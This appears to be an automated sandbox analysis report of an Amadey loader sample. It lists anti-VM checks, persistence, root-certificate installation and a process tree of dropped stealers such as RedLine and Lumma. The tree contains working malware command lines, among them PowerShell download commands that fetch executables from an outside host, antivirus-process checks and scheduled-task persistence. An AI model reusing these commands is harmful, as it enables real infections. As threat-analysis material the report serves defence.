amadey | da15b0d8fccdfbaef9b53dbd6fabccc96ed8b4c48574248f47f69080f3980b34

Virtualization/Sandbox Evasion

Processes:

axplons.exe347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
3640	bcdedit.exe
2720	bcdedit.exe
2172	bcdedit.exe
3960	bcdedit.exe
3908	bcdedit.exe
816	bcdedit.exe
3640	bcdedit.exe
3744	bcdedit.exe
3580	bcdedit.exe
3348	bcdedit.exe
2284	bcdedit.exe
3968	bcdedit.exe
2208	bcdedit.exe
3764	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.exe

pid	process
3712	powershell.exe
3044	powershell.exe
2992	powershell.exe
3888	powershell.exe
1000	powershell.exe
1604	powershell.exe
2992	powershell.exe
2236	powershell.exe
3800	powershell.exe
272	powershell.exe
4324	powershell.EXE
3284	powershell.exe
3588	powershell.exe
3840	powershell.exe
2728	powershell.exe
3164	powershell.EXE
268	powershell.EXE
1720	powershell.exe
3888	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

2376 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
2376	netsh.exe

.NET Reactor proctector 29 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/1424-618-0x0000000002230000-0x0000000002296000-memory.dmp	net_reactor
behavioral1/memory/1424-619-0x0000000004750000-0x00000000047B4000-memory.dmp	net_reactor
behavioral1/memory/1424-667-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-691-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-687-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-681-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-679-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-676-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-674-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-671-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-669-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-665-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-663-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-661-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-659-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-657-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-655-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-653-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-651-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-649-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-647-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-645-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-643-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-641-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-639-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-637-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-635-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-633-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor
behavioral1/memory/1424-632-0x0000000004750000-0x00000000047AF000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

Processes:

347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exeaxplons.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe

Executes dropped EXE 8 IoCs

Processes:

axplons.exealex.execrypted333.exeredline1.exeinstall.exeGameService.exeGameService.exeGameService.exe

pid process

2564 axplons.exe
2692 alex.exe
1548 crypted333.exe
2004 redline1.exe
1056 install.exe
2908 GameService.exe
1540 GameService.exe
1248 GameService.exe

pid	process
2564	axplons.exe
2692	alex.exe
1548	crypted333.exe
2004	redline1.exe
1056	install.exe
2908	GameService.exe
1540	GameService.exe
1248	GameService.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Wine	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Wine	axplons.exe

Loads dropped DLL 14 IoCs

Processes:

347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exeaxplons.exeWerFault.exeWerFault.execmd.exe

pid	process
1984	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe
2564	axplons.exe
2564	axplons.exe
1124	WerFault.exe
1124	WerFault.exe
1124	WerFault.exe
2564	axplons.exe
2564	axplons.exe
1456	WerFault.exe
1456	WerFault.exe
1456	WerFault.exe
2564	axplons.exe
2564	axplons.exe
848	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

33 pastebin.com
36 pastebin.com
143 drive.google.com
144 drive.google.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

92 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exeaxplons.exe

pid process

1984 347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe
2564 axplons.exe

flow	ioc
33	pastebin.com
36	pastebin.com
143	drive.google.com
144	drive.google.com

flow	ioc
92	ip-api.com

Drops file in Program Files directory 14 IoCs

Processes:

install.exe

description	ioc	process
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe

Drops file in Windows directory 1 IoCs

Processes:

347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe

description ioc process

File created C:\Windows\Tasks\axplons.job 347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe

description	ioc	process
File created	C:\Windows\Tasks\axplons.job	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
3092	sc.exe
3028	sc.exe
3636	sc.exe
4028	sc.exe
2892	sc.exe
1712	sc.exe
2088	sc.exe
272	sc.exe
268	sc.exe
2256	sc.exe
4484	sc.exe
3164	sc.exe
2724	sc.exe
2112	sc.exe
1720	sc.exe
3272	sc.exe
2160	sc.exe
2836	sc.exe
3284	sc.exe
3200	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1124	2692	WerFault.exe	alex.exe
1456	1548	WerFault.exe	crypted333.exe
1900	1664	WerFault.exe
560	2132	WerFault.exe	lumma1.exe
3852	3140	WerFault.exe	build13.exe

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2748	schtasks.exe
3100	schtasks.exe
3384	schtasks.exe
1736	schtasks.exe
3196	schtasks.exe
4224	schtasks.exe
4596	schtasks.exe
2920	schtasks.exe
1976	schtasks.exe
2728	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4384 timeout.exe
3136 timeout.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

3204 tasklist.exe
3540 tasklist.exe
1280 tasklist.exe
1556 tasklist.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1780 taskkill.exe

pid	process
4384	timeout.exe
3136	timeout.exe

pid	process
3204	tasklist.exe
3540	tasklist.exe
1280	tasklist.exe
1556	tasklist.exe

pid	process
1780	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

redline1.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	redline1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	redline1.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

1988 PING.EXE
2196 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exeaxplons.exe

pid process

1984 347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe
2564 axplons.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe

pid process

1984 347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe

pid	process
1988	PING.EXE
2196	PING.EXE

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exeaxplons.exealex.execrypted333.exeinstall.execmd.exe

description	pid	process	target process
PID 1984 wrote to memory of 2564	1984	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe	axplons.exe
PID 1984 wrote to memory of 2564	1984	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe	axplons.exe
PID 1984 wrote to memory of 2564	1984	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe	axplons.exe
PID 1984 wrote to memory of 2564	1984	347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe	axplons.exe
PID 2564 wrote to memory of 2692	2564	axplons.exe	alex.exe
PID 2564 wrote to memory of 2692	2564	axplons.exe	alex.exe
PID 2564 wrote to memory of 2692	2564	axplons.exe	alex.exe
PID 2564 wrote to memory of 2692	2564	axplons.exe	alex.exe
PID 2692 wrote to memory of 1124	2692	alex.exe	WerFault.exe
PID 2692 wrote to memory of 1124	2692	alex.exe	WerFault.exe
PID 2692 wrote to memory of 1124	2692	alex.exe	WerFault.exe
PID 2692 wrote to memory of 1124	2692	alex.exe	WerFault.exe
PID 2564 wrote to memory of 1548	2564	axplons.exe	crypted333.exe
PID 2564 wrote to memory of 1548	2564	axplons.exe	crypted333.exe
PID 2564 wrote to memory of 1548	2564	axplons.exe	crypted333.exe
PID 2564 wrote to memory of 1548	2564	axplons.exe	crypted333.exe
PID 1548 wrote to memory of 1456	1548	crypted333.exe	WerFault.exe
PID 1548 wrote to memory of 1456	1548	crypted333.exe	WerFault.exe
PID 1548 wrote to memory of 1456	1548	crypted333.exe	WerFault.exe
PID 1548 wrote to memory of 1456	1548	crypted333.exe	WerFault.exe
PID 2564 wrote to memory of 2004	2564	axplons.exe	redline1.exe
PID 2564 wrote to memory of 2004	2564	axplons.exe	redline1.exe
PID 2564 wrote to memory of 2004	2564	axplons.exe	redline1.exe
PID 2564 wrote to memory of 2004	2564	axplons.exe	redline1.exe
PID 2564 wrote to memory of 1056	2564	axplons.exe	install.exe
PID 2564 wrote to memory of 1056	2564	axplons.exe	install.exe
PID 2564 wrote to memory of 1056	2564	axplons.exe	install.exe
PID 2564 wrote to memory of 1056	2564	axplons.exe	install.exe
PID 2564 wrote to memory of 1056	2564	axplons.exe	install.exe
PID 2564 wrote to memory of 1056	2564	axplons.exe	install.exe
PID 2564 wrote to memory of 1056	2564	axplons.exe	install.exe
PID 1056 wrote to memory of 848	1056	install.exe	cmd.exe
PID 1056 wrote to memory of 848	1056	install.exe	cmd.exe
PID 1056 wrote to memory of 848	1056	install.exe	cmd.exe
PID 1056 wrote to memory of 848	1056	install.exe	cmd.exe
PID 1056 wrote to memory of 848	1056	install.exe	cmd.exe
PID 1056 wrote to memory of 848	1056	install.exe	cmd.exe
PID 1056 wrote to memory of 848	1056	install.exe	cmd.exe
PID 848 wrote to memory of 2892	848	cmd.exe	conhost.exe
PID 848 wrote to memory of 2892	848	cmd.exe	conhost.exe
PID 848 wrote to memory of 2892	848	cmd.exe	conhost.exe
PID 848 wrote to memory of 2892	848	cmd.exe	conhost.exe
PID 848 wrote to memory of 2908	848	cmd.exe	GameService.exe
PID 848 wrote to memory of 2908	848	cmd.exe	GameService.exe
PID 848 wrote to memory of 2908	848	cmd.exe	GameService.exe
PID 848 wrote to memory of 2908	848	cmd.exe	GameService.exe
PID 848 wrote to memory of 1712	848	cmd.exe	sc.exe
PID 848 wrote to memory of 1712	848	cmd.exe	sc.exe
PID 848 wrote to memory of 1712	848	cmd.exe	sc.exe
PID 848 wrote to memory of 1712	848	cmd.exe	sc.exe
PID 848 wrote to memory of 1540	848	cmd.exe	GameService.exe
PID 848 wrote to memory of 1540	848	cmd.exe	GameService.exe
PID 848 wrote to memory of 1540	848	cmd.exe	GameService.exe
PID 848 wrote to memory of 1540	848	cmd.exe	GameService.exe
PID 848 wrote to memory of 1248	848	cmd.exe	Install.exe
PID 848 wrote to memory of 1248	848	cmd.exe	Install.exe
PID 848 wrote to memory of 1248	848	cmd.exe	Install.exe
PID 848 wrote to memory of 1248	848	cmd.exe	Install.exe

C:\Users\Admin\AppData\Local\Temp\347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\347e422b2ae7c101b6482d718a442080_NeikiAnalytics.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1984

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2564

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 96
4⤵
- Loads dropped DLL
- Program crash
PID:1124

C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 96
4⤵
- Loads dropped DLL
- Program crash
PID:1456

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2004

C:\Users\Admin\AppData\Local\Temp\pl.exe
"C:\Users\Admin\AppData\Local\Temp\pl.exe"
4⤵
PID:3936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit
5⤵
PID:3836

C:\Windows\SysWOW64\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:1280

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
6⤵
PID:2724

C:\Windows\SysWOW64\tasklist.exe
tasklist
6⤵
- Enumerates processes with tasklist
PID:1556

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
6⤵
PID:2800

C:\Windows\SysWOW64\cmd.exe
cmd /c md 334513
6⤵
PID:3716

C:\Windows\SysWOW64\findstr.exe
findstr /V "EnquiryAnContributionRefers" Tank
6⤵
PID:4020

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Ph + Shoot 334513\r
6⤵
PID:1000

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\334513\Rent.pif
334513\Rent.pif 334513\r
6⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\ProgramData\JEHIDHDAKJ.exe"
7⤵
PID:3848

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\334513\Rent.pif" & rd /s /q "C:\ProgramData\FIDGDAKFHIEH" & exit
7⤵
PID:2068

C:\Windows\SysWOW64\timeout.exe
timeout /t 10
8⤵
- Delays execution with timeout.exe
PID:3136

C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
6⤵
- Runs ping.exe
PID:2196

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:848

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClient
5⤵
- Launches sc.exe
PID:2892

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClient confirm
5⤵
- Executes dropped EXE
PID:2908

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLink
5⤵
- Launches sc.exe
PID:1712

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLink confirm
5⤵
- Executes dropped EXE
PID:1540

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
5⤵
- Executes dropped EXE
PID:1248

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLink
5⤵
PID:1864

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
4⤵
PID:2572

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClientC
5⤵
- Launches sc.exe
PID:2836

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClientC confirm
5⤵
PID:2448

C:\Windows\SysWOW64\sc.exe
Sc delete PiercingNetLink
5⤵
- Launches sc.exe
PID:2160

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove PiercingNetLink confirm
5⤵
PID:2500

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
5⤵
PID:2508

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start PiercingNetLink
5⤵
PID:2600

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
4⤵
PID:1212

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLinks
5⤵
- Launches sc.exe
PID:2088

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLinks confirm
5⤵
PID:1512

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
5⤵
PID:2032

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLinks
5⤵
PID:2008

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
4⤵
PID:992

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"
3⤵
PID:1664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 96
4⤵
- Program crash
PID:1900

C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
3⤵
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 52
4⤵
- Program crash
PID:560

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
3⤵
PID:3056

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
4⤵
- Creates scheduled task(s)
PID:2920

C:\Users\Admin\AppData\Local\Temp\1000266001\dl.exe
"C:\Users\Admin\AppData\Local\Temp\1000266001\dl.exe"
4⤵
PID:2156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "dl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000266001\dl.exe" & exit
5⤵
PID:2024

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "dl.exe" /f
6⤵
- Kills process with taskkill
PID:1780

C:\Users\Admin\AppData\Local\Temp\1000267001\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\1000267001\toolspub1.exe"
4⤵
PID:816

C:\Users\Admin\AppData\Local\Temp\1000269001\vpn-1002.exe
"C:\Users\Admin\AppData\Local\Temp\1000269001\vpn-1002.exe"
4⤵
PID:2360

C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsd7013.tmp\abc.bat"
5⤵
PID:1572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2236

C:\Users\Admin\AppData\Local\Temp\i0.exe
i0.exe /verysilent /sub=1000
6⤵
PID:3784

C:\Users\Admin\AppData\Local\Temp\is-KESJI.tmp\i0.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KESJI.tmp\i0.tmp" /SL5="$1020E,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000
7⤵
PID:3848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
6⤵
- Command and Scripting Interpreter: PowerShell
PID:3800

C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
3⤵
PID:2064

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
